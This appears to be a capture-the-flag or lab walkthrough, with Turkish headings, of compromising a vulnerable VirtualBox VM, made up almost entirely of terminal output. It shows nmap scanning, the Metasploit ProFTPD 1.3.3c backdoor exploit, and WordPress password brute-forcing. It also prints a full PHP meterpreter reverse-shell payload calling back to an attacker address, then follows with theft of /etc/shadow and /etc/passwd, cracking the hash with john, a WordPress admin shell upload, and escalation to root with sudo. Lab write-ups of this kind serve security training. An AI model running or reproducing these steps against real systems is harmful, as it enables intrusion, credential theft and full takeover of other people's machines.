[email protected]:~# nmap -sV -A -v 192.168.1.25
Nmap scan report for 192.168.1.25
Host is up (0.00071s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 08:00:27:9E:1F:89 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Uptime guess: 12.168 days (since Thu Oct 17 09:49:47 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
- 0.71 ms 192.168.1.25
Proftpd için exploit Araması
msf5 > search proftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 – 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)
3 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
4 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
5 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
— —-
0 Automatic
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[email protected]:~/basic1# unshadow passwd shadow > merged
[email protected]:~/basic1# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-29 15:39) 14.28g/s 71.42p/s 71.42c/s 71.42C/s marlinspike..marli
Use the “–show” option to display all of the cracked passwords reliably
Session completed
WordPress Vulnerability
msf5 > use auxiliary/scanner/http/wordpress_login_enum
msf5 auxiliary(scanner/http/wordpress_login_enum) > set username admin
username => admin
msf5 auxiliary(scanner/http/wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
pass_file => /usr/share/wordlists/dirb/common.txt
msf5 auxiliary(scanner/http/wordpress_login_enum) > set targeturi /secret/
targeturi => /secret/
msf5 auxiliary(scanner/http/wordpress_login_enum) > set rhosts 192.168.1.30
rhosts1 => 192.168.1.30
msf5 auxiliary(scanner/http/wordpress_login_enum) >exploit
[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.26 lport=6565 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = ‘192.168.1.26’; $port = 6565; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp://{$ip}:{$port}”); $s_type = ‘stream’; } if (!$s && ($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } if (!$s && ($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } if (!$s_type) { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; if (extension_loaded(‘suhosin’) && ini_get(‘suhosin.executor.disable_eval’)) { $suhosin_bypass=create_function(”, $b); $suhosin_bypass(); } else { eval($b); } die();
msf5 auxiliary(scanner/http/wordpress_login_enum) > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf5 exploit(multi/handler) > set lport 6565
lport => 6565
msf5 exploit(multi/handler) > run
meterpreter > download /etc/shadow
[*] Downloading: /etc/shadow -> shadow
[*] Downloaded 1.27 KiB of 1.27 KiB (100.0%): /etc/shadow -> shadow
[*] download : /etc/shadow -> shadow
meterpreter > download /etc/passwd
[*] Downloading: /etc/passwd -> passwd
[*] Downloaded 2.31 KiB of 2.31 KiB (100.0%): /etc/passwd -> passwd
[*] download : /etc/passwd -> passwd
meterpreter >
[email protected]:~# unshadow passwd shadow > merged
[email protected]:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
[email protected]:~# cd ~/.john
[email protected]:~/.john# rm john.pot
[email protected]:~/.john# cd –
/root
[email protected]:~# john merged
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press ‘q’ or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-10-30 16:13) 2.040g/s 10.20p/s 10.20c/s 10.20C/s marlinspike..marli
Use the “–show” option to display all of the cracked passwords reliably
Session completed
python -c ‘import pty; pty.spawn(“/bin/sh”)’ (http://netsec.ws/?p=337)
Bir Başka Yöntem
msf5 exploit(multi/handler) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.1.30
RHOSTS => 192.168.1.30
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > shell
Process 558 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
python -c ‘import pty; pty.spawn(“/bin/sh”)’
sh: 0: getcwd() failed: No such file or directory
$ su – marlinspike
su – marlinspike
Password: marlinspike
[email protected]:~$ sudo bash
sudo bash
[sudo] password for marlinspike: marlinspike
[email protected]:~# whoami
whoami
root
SSH Walkthrough
[email protected]:~# ssh [email protected]
The authenticity of host ‘192.168.1.25 (192.168.1.25)’ can’t be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘192.168.1.25’ (ECDSA) to the list of known hosts.
[email protected]’s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
593 packages can be updated.
420 updates are security updates.
New release ‘18.04.3 LTS’ available.
Run ‘do-release-upgrade’ to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.